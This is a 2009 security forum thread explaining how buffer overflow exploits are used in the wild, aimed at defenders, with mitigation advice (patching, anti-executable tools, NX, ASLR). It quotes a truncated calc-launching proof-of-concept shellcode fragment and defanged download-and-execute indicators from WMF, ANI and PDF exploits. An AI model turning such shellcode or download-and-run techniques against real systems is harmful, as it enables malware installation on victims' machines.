Buffer Overflow Attacks Unmasked

Discussion in 'other security issues & news' started by Rmus, Jun 6, 2009.

Thread Status:
Not open for further replies.
  1. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    A description of buffer overflow is presented here:

    http://en.wikipedia.org/wiki/Buffer_overrun

    In addition to the technical aspects, it's instructive to look at the practical uses of buffer overflow by malware in the wild.

    Essentially, a malware writer finds an application with a buffer overflow vulnerability and crafts a file for that application with his/her own Shellcode (instructions) to carry out the attack.

    Proofs of Concept (PoC) demonstrate this, often by having the Shellcode (instructions) launch the Windows Calculator.

    Here is a PoC for WinAmp - Parsing Integer Overflow Exploit

    The author's Shellcode:

    Code:
    /* win32_exec ... CMD=Calc
    
    char Calc_ShellCode [] =
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
        "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    
    ...
    
    If a malware writer decides to craft an exploit in the wild for this vulnerability, what Shellcode (instructions) do you think would most likely be included?

    • launch the calculator

    • popup message, "Hi There!"

    • delete the user's photographs of Aunt Minnie

    • format the user's hard drive

    • connect out to a server to download malware

    If you chose the last, you are familiar with some of the current Buffer Overflow Exploits that have surfaced in the wild. Here are three examples.

    WMF

    Probably the most sensational use of this type of exploit was the Windows Media File Handling Buffer Overflow Vulnerability (.wmf file). The exploit was later used in other image file types and various image viewers, including Ifran. This is from an analysis:

    http://blog.threatfire.com/2007/12/shellcode-analysis-download-n-exec.html

    ANI

    Preceding WMF was the Animated Cursor Buffer Overflow Vulnerability (.ani file). Inside the file was similar code to download a trojan:

    Code:
    [B]urlmon.dll_URLDownloadToFileA[/B]
    hxxp://kunxxxxxxxx.de/daten/dlle.exe
    dlle.exe was later detected as Trojan-Downloader.Win32.Agent


    PDF

    Most recently are the buffer overflow exploits in Adobe Acrobat Reader (.pdf file). Same code:

    Code:
    [B]URLMON.DLL. URLDownloadToFileA[/B].
    hxxp://xxxxxxxxxxxx.cn/load.php?
    load.exe was later detected as InfoStealer.Snifula.a


    Buffer Overflow is a useful exploit technique and most likely, more vulnerabilities in applications already exploited, and vulnerabilities in other applications, wait to be discovered.

    PREVENTATIVE MEASURES

    • Naturally, if the user has a patched version of the application, the exploit fails. Experience shows, however, that there is often a window of opportunity between the release of the exploit in the wild and the emgergence of a patch.

    • Anti-virus products to flag the malicious file. May not be reliable because the files often go undetected for a period of time.

    • Products that protect against Buffer Overflow. I've read about these but have not seen tests against exploits in the wild.

    • Products that block the installation of the malware executables. Many solutions available.

    ----
    rich
     
  2. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Good info as always, and very fortutitous too, as i posted in another thread regarding Buffer Attacks the other day.

    Yeah i sure remember the fun i had with the WMF exploits, trying to get blasted on IE6/98SE with a whole host of those nasties. But couldn't no matter how many times i tried. You were heavily involved in testing and analysis, if i remember correctly.
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Yes, I remember your posts. Win98 was not vulnerable, I think. Win2K was, but I could not get any of the infected websites to trigger the exploit. I set up my XP Laptop to test, and sure enough, it worked. The exploit used an i-frame to download the .wmf file into the Windows Picture and Fax Viewer. Win2K has neither that file-type association, nor that viewer.

    You may remember there was a lot of confusion about this exploit (late Dec 2005) and Microsoft didn't release a patch until the following week. Also, there were different attack vectors, as this cert.org chart from early 2006 showed:

    exploitChart.gif

    I mention this because this whole episode was instructive for me regarding prevention. A friend was also looking at this exploit at that time, and we agreed that you have to do your own work and dig for the information to find out what is going on, so that you can advise those you are helping. Many of the articles were caught up in the frenzy to find work-arounds, including a third-party patch released before the Microsoft patch. For us, getting the pertinent specific information negated the need for a frantic reaction.

    In other words, you have to unmask the exploit to see what is really going on.

    I had seen the web site exploits but cert.org summarized the other methods. This verified that only IE would trigger the web-based exploit, where other browsers prompted for the download, which I confirmed. I was able to ensure those I helped at that time that the web-based exploit would fail, since they were using Opera. The other methods required the user to click on the image in an email attachment, which, I was pretty sure, they wouldn't do! Nonetheless, they had protection against the executable component of the exploit, just in case.

    One other point you may remember: several people crafted some benign Proofs of Concept .wmf files that launched the Windows Calculator, to prove that embedded code could do most anything. My friend and I searched in vain for WMF exploits that did something other than download malware and found none, nor any reports of any.

    This was not surprising, nor is it today: the aim of exploits in the wild is to get malware onto the system. That is where the money is.

    ----
    rich
     
    Last edited: Jun 8, 2009
  4. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    I have always disabled I-Frames, and lot of the other Internet Options in IE, but as you say 98SE turned out to be safe, and safer than XP lol.

    I've lost count of the amount of Proof of Concept .WMF files i, you and others tested, posting screenys of all the events.

    Some people reading this might not know that at the time this " hole " in Windows was called " Microsofts back door " which was later retracted. But it appeared as if it could be at first.

    Yes Anti EXE Apps are definately a good idea. I know you swear by Faronics Anti-Executable, ( previous version ) and i used WinSonar free for many years with great success http://digilander.libero.it/zancart/winsonar.html
     
  5. chronomatic

    chronomatic Registered Member

    Joined:
    Apr 9, 2009
    Posts:
    1,343
    Buffer overflows (on the stack and heap) can be mitigated with various compiler options like Position Independent Code (no such thing on Windows), stack smashing protections, ASLR, executable space protection, and a MAC system.

    Most 64 bit processors have the "NX bit" which can make certain areas of the memory non-executable. I think Vista has some of these protections built in (I know it utilizes the NX bit as well as ASLR, though Microsoft was about 5 years behind BSD and Linux on this). XP SP2 also uses the NX bit, but not ASLR. No version of Windows has a MAC system built in yet, though there are third party solutions I believe (usually referred to as HIPS).

    The PaX developers were the first to implement many of these measures (especially ASLR) and make them workable, but PaX was developed as a Linux kernel patch (all of this third party software aimed at Windows that utilizes these technologies are pretty much just Windows ports of PaX. In fact, Microsoft's own implementation of ASLR in Vista was "inspired" by all the work what the PaX team did). The same goes for the WehnTrust HIPS. At the bottom of their page, they give credit to the PaX team.

    I can say from experience that the aforementioned "measures" will indeed stop some (not all) of these attacks dead. However, a side effect is that it will often kill programs that intentionally allow data to be executed and/or written outside of the buffer. Therefore, it can take a lot of "tweaking" to get some applications to work. In a perfect world, application developers wouldn't allow their programs to utilize memory where it shouldn't be. But then again, in a perfect world there would be no need for these protections at all because the programmers would be perfect. :)
     
Loading...
Thread Status:
Not open for further replies.